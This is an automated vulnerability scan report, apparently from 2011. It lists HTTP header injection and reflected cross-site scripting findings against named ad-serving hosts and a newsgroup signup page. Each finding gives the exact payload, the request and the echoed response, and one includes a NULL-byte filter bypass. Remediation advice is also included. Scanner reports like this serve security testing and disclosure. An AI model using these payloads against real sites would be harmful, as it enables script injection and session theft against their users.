HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 2 is copied into the Location response header. The payload b0624%0d%0ab55b04ac9a8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /pixel/b0624%0d%0ab55b04ac9a8/2PEGT3UB35E6RMJYTASSQH?pv=709723867.4759865&cookie=&keyw= HTTP/1.1 Host: d.adroll.com Proxy-Connection: keep-alive Referer: http://www.snapengage.com/plans User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Server: nginx/0.8.54 Date: Tue, 02 Aug 2011 11:22:39 GMT Connection: keep-alive Set-Cookie: __adroll=4d9ea333e1878cefa789df91cebf503e; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/ Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com/pixel/b0624 b55b04ac9a8/2PEGT3UB35E6RMJYTASSQH/FWOQF77OPZHKJHKC2K6BJZ.js: Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate
The value of REST URL parameter 3 is copied into the Location response header. The payload 5abc0%0d%0ae08b623f322 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /pixel/CIF4HHWJRFFZXJ6A7DZHTI/5abc0%0d%0ae08b623f322?pv=709723867.4759865&cookie=&keyw= HTTP/1.1 Host: d.adroll.com Proxy-Connection: keep-alive Referer: http://www.snapengage.com/plans User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Server: nginx/0.8.54 Date: Tue, 02 Aug 2011 11:22:40 GMT Connection: keep-alive Set-Cookie: __adroll=4d9ea333e1878cefa789df91cebf503e; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/ Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com/retarget/CIF4HHWJRFFZXJ6A7DZHTI/5abc0 e08b623f322/pixel.js: Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate
2. Cross-site scripting (reflected)previous There are 210 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the adult_access request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54739"><script>alert(1)</script>f5ece6155aa was submitted in the adult_access parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<head> <title>Newsguy - Open a Newsgroup Account</title> <meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space, software, archives, art & music galleries, feature c ...[SNIP]... <input type="hidden" name="adult_access" value="yes54739"><script>alert(1)</script>f5ece6155aa"> ...[SNIP]...
The value of the iaccess request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb47"><script>alert(1)</script>89203b485c9 was submitted in the iaccess parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<head> <title>Newsguy - Open a Newsgroup Account</title> <meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space, software, archives, art & music galleries, feature c ...[SNIP]... <input type="hidden" name="iaccess" value="f3fb47"><script>alert(1)</script>89203b485c9"> ...[SNIP]...
The value of the product request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 599c1"><script>alert(1)</script>7b6ecef1952 was submitted in the product parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<head> <title>Newsguy - Open a Newsgroup Account</title> <meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space, software, archives, art & music galleries, feature c ...[SNIP]... <input type="hidden" name="product" value="11117599c1"><script>alert(1)</script>7b6ecef1952"> ...[SNIP]...
The value of the refer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b17fb"><script>alert(1)</script>87b0527d55f was submitted in the refer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<head> <title>Newsguy - Open a Newsgroup Account</title> <meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space, software, archives, art & music galleries, feature c ...[SNIP]... <input type="hidden" name="refer" value="b17fb"><script>alert(1)</script>87b0527d55f"> ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe518"-alert(1)-"940200817b0 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6293 Date: Wed, 03 Aug 2011 13:12:57 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 2362466/300x250-home-free.png"; var minV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843fe518"-alert(1)-"940200817b0&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3c08'-alert(1)-'694d2b5e093 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6293 Date: Wed, 03 Aug 2011 13:13:02 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843e3c08'-alert(1)-'694d2b5e093&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307 ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58fdc"-alert(1)-"a25eb4d0da was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6289 Date: Wed, 03 Aug 2011 13:13:28 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... inV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=189858050558fdc"-alert(1)-"a25eb4d0da&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dc/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7 ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66c23'-alert(1)-'8ecd3b658ad was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6293 Date: Wed, 03 Aug 2011 13:13:34 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=189858050566c23'-alert(1)-'8ecd3b658ad&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7 ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ea4b'-alert(1)-'20c252c7b3 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6289 Date: Wed, 03 Aug 2011 13:13:59 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... et=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f9ea4b'-alert(1)-'20c252c7b3&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dc/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3fhttp://www.morethan.com/Pages/Product ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a943d"-alert(1)-"51f858c998 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6289 Date: Wed, 03 Aug 2011 13:13:54 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68fa943d"-alert(1)-"51f858c998&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dc/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3fhttp://www.morethan.com/Pages/Product ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00a4bc4'-alert(1)-'19ce244ece3 was submitted in the PG parameter. This input was echoed as a4bc4'-alert(1)-'19ce244ece3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6305 Cache-Control: no-cache Pragma: no-cache Date: Wed, 03 Aug 2011 13:13:49 GMT Expires: Wed, 03 Aug 2011 13:13:49 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO%00a4bc4'-alert(1)-'19ce244ece3&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/e0/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3 ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00fc8ce"-alert(1)-"05ecbe75c42 was submitted in the PG parameter. This input was echoed as fc8ce"-alert(1)-"05ecbe75c42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6305 Cache-Control: no-cache Pragma: no-cache Date: Wed, 03 Aug 2011 13:13:41 GMT Expires: Wed, 03 Aug 2011 13:13:41 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO%00fc8ce"-alert(1)-"05ecbe75c42&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/e0/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3 ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9382f'-alert(1)-'79b3021c1ab was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6293 Date: Wed, 03 Aug 2011 13:13:23 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=532360819382f'-alert(1)-'79b3021c1ab&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/4080 ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ada41"-alert(1)-"0e77f79419f was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6293 Date: Wed, 03 Aug 2011 13:13:18 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... e.png"; var minV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081ada41"-alert(1)-"0e77f79419f&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/4080 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1035a'-alert(1)-'0f70069ec78 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6293 Date: Wed, 03 Aug 2011 13:13:13 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G1035a'-alert(1)-'0f70069ec78&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/2 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85755"-alert(1)-"a3b4d6a09cc was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6293 Date: Wed, 03 Aug 2011 13:13:08 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 6/300x250-home-free.png"; var minV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G85755"-alert(1)-"a3b4d6a09cc&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/2 ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d150"-alert(1)-"1af3a768ac2 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6293 Cache-Control: no-cache Pragma: no-cache Date: Wed, 03 Aug 2011 13:14:04 GMT Expires: Wed, 03 Aug 2011 13:14:04 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=1d150"-alert(1)-"1af3a768ac2http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3fhttp://www.morethan.com/Pages/Products/Home/HomeHo ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bf49'-alert(1)-'35eddab7d06 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6293 Cache-Control: no-cache Pragma: no-cache Date: Wed, 03 Aug 2011 13:14:10 GMT Expires: Wed, 03 Aug 2011 13:14:10 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=3bf49'-alert(1)-'35eddab7d06http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3fhttp://www.morethan.com/Pages/Products/Home/HomeHo ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a62d'-alert(1)-'10725b25213 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6293 Date: Wed, 03 Aug 2011 13:12:51 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!8a62d'-alert(1)-'10725b25213&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bdf6"-alert(1)-"e20e390bb3b was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6293 Date: Wed, 03 Aug 2011 13:12:46 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /s0.2mdn.net/2362466/300x250-home-free.png"; var minV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!2bdf6"-alert(1)-"e20e390bb3b&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b100"-alert(1)-"c812f1ccf3a was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
